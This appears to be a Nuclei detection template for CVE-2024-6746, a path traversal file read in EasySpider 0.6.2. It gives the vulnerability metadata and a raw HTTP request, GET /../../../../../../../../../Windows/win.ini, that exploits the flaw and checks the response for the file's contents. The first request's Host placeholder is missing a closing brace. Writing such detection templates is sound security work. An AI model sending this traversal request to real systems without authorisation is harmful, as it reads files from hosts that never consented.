EasySpider 0.6.2 - Arbitrary File Read

id: CVE-2024-6746

info:
  name: EasySpider 0.6.2 - Arbitrary File Read
  author: securityforeveryone
  severity: medium
  description: |
    A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
  reference:
    - https://github.com/NaiboWang/EasySpider/issues/466
    - https://cvefeed.io/vuln/detail/CVE-2024-6746
    - https://vuldb.com/?id.271477
    - https://vuldb.com/?submit.371998
    - https://vuldb.com/?ctiid.271477
    - https://github.com/NaiboWang/EasySpider
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-6746
    cwe-id: CWE-24
    epss-score: 0.00045
    epss-percentile: 0.1594
  metadata:
    vendor: naibowang
    product: easyspider
  tags: cve,cve2024,lfi,network

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /taskGrid/tasklist.html HTTP/1.1
        Host: {{Hostname}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /../../../../../../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950